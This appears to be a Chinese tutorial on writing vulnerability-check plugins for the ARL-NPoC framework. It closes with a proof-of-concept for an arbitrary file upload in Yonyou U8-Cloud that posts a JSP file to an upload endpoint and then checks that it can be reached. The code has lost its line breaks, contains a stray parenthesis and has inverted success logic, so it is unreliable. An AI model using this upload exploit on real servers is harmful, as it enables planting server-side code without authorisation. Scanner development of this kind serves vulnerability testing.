nuclei写poc？还得是ARL！

docker exec  -it 407edbf4b35b /bin/bash

cd /opt/ARL-NPoC && ls

docker cp 407edbf4b35b:/opt/ARL-NPoC /

pip install -r requirements.txt

__init()__:初始化函数。复制成功def __init__(self):    super(Plugin, self).__init__()    # 插件类型poc    self.plugin_type = PluginType.POC    # 插件name    self.vul_name = "泛微 Ecology getdata.jsp SQL注入漏洞"    # 探测组件name    self.app_name = 'Ecology'    # 探测协议？    self.scheme = [SchemeType.HTTP, SchemeType.HTTPS]verify():验证函数。def verify(self, target):   #参数targethttp_req():请求函数。def http_req(url, method = 'get', **kwargs): #传入url,请求方法get,post....post请求实例：http_req(url, method='post', data=data)http_req(url, method='post', data=data, headers=header)http_req()处理方法1. content(): # 获取响应包conn = http_req(url, "get")if b"GitLab" not in conn.content:      return False2. json(): # json处理响应包conn = http_req(url, "get")data = conn.json()3. status_code：#获取响应值conn = http_req(url, "get", auth=(user, passwd))if conn.status_code == 200:     return Trueconn = http_req(url)4. text: #获取响应体。和content类似吧conn = http_req(url, "get")pattern = r'<metas+name="csrf-token"s+content="([^"]+)+"s+/>'matches = re.findall(pattern=pattern, string=conn.text)5. headers.get() # 获取响应头conn = http_req(url, "get")if self._check_str not in conn.headers.get("WWW-Authenticate", ""):       return False6.self.logger.debug() #信息回显self.logger.debug("not Ecology {}".format(target))def init_logger():    log_colors = {        'DEBUG': 'white',        'INFO': 'green',        'SUCCESS':  'red',        'WARNING': 'yellow',        'ERROR': 'red',        'CRITICAL': 'bold_red',    }

pip install -e .      # 安装依赖python setup.py --help-commands  # 查看安装命令帮助python setup.py install       # 安装

xing -h

#app="用友-U8-Cloud"# 导入必要的模块from xing.core.BasePlugin import BasePlugin  # 导入BasePlugin类，用于创建插件基类from xing.utils import http_req  # 导入http_req函数，用于发送HTTP请求from xing.core import PluginType, SchemeType  # 导入PluginType和SchemeType枚举，用于指定插件类型和协议类型# 定义Plugin类，继承自BasePluginclass Plugin(BasePlugin):    def __init__(self):        super(Plugin, self).__init__()  # 调用父类的构造函数        self.plugin_type = PluginType.POC  # 将插件类型设置为POC（Proof of Concept，概念验证）        self.vul_name = "用友-U8-Cloud-任意文件上传"  # 定义漏洞名称        self.app_name = 'U8'  # 将应用程序名称定义为 U8        self.scheme = [SchemeType.HTTP]  # 指定支持的协议类型和HTTP    # 定义用于检测漏洞的verify方法    def verify(self, target):        path = ["/linux/pages/upload.jsp"]  # 定义待检测的路径列表        url = target + path[0]  # 构建完整的URL        # 设置请求头        header = {            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0",            "Accept-Encoding": "gzip, deflate",            "Accept": "*/*",            "Connection": "close",            "Content-Type": "application/x-www-form-urlencoded",            "filename": "55051.jsp",            "Content-Length": "30"        }        # 发送POST请求并获取响应        data = '<% out.println("Console"); %>'  # POST请求的数据        #conn = requests.post(url, data=data, headers=header)        conn = http_req(url, method='post', data=data, headers=header)        content = conn.content  # 获取返回的内容        # 发送GET请求并获取状态码        conn1 = http_req(url + '/linux/55051.jsp')        if conn.status_code != 404:  # 如果状态码不是404            if (b"<title>This page for response" not in content and b"upload success" not in content) :  # 如果返回的内容不包含"<title>This page for response"或者"success file"                self.logger.success("not found U8-Cloud-upload file")  # 打印调试信息                return url              if (b"<title>This page for response" in content or b"upload success" in content) or (conn1.status_code == 200):  # 如果返回的内容包含指定的字符串                self.logger.success("用友U8-Cloud-upload {}".format(target+'/linux/55051.jsp')) # 打印成功信息                return target+'/linux/55051.jsp'                   )                 #return必须写,作为风险巡航-漏扫-凭证会用到

app="用友-U8-Cloud"